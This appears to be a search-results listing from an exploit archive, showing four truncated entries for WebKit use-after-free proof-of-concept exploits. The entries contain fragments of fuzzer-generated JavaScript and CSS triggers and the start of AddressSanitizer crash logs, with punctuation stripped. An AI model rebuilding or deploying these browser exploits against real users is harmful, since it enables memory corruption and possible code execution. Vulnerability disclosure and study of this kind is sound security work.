4 matches found
WebKit - WebCore::Node::ensureRareData Use-After-Free
WebKit - WebCore::Node::ensureRareData Use-After-Free .class1 -webkit-mask-box-image-source: urlfoo; function freememory var a; forvar i=0;i100;i++ a = new Uint8Array10241024; document.implementation.createHTMLDocument"doc"; function jsfuzzer try var00097 = document.createElement"source"; catche...
WebKit - 'WebCore::PositionIterator::decrement' Use-After-Free
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1346 There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. PoC: ================================================================= / function jsfuzzer...
WebKit - WebCore::Node::nextSibling Use-After-Free
WebKit - WebCore::Node::nextSibling Use-After-Free function freememory var a; forvar i=0;i !-- ================================================================= ASan log: ================================================================= ==29516==ERROR: AddressSanitizer: heap-use-after-free on...
WebKit - 'WebCore::Node::getFlag' Use-After-Free
-webkit-flow-into: textarea; function freememory var a; forvar i=0;i foo !-- ================================================================= ASan log: ================================================================= ==29717==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000053b3...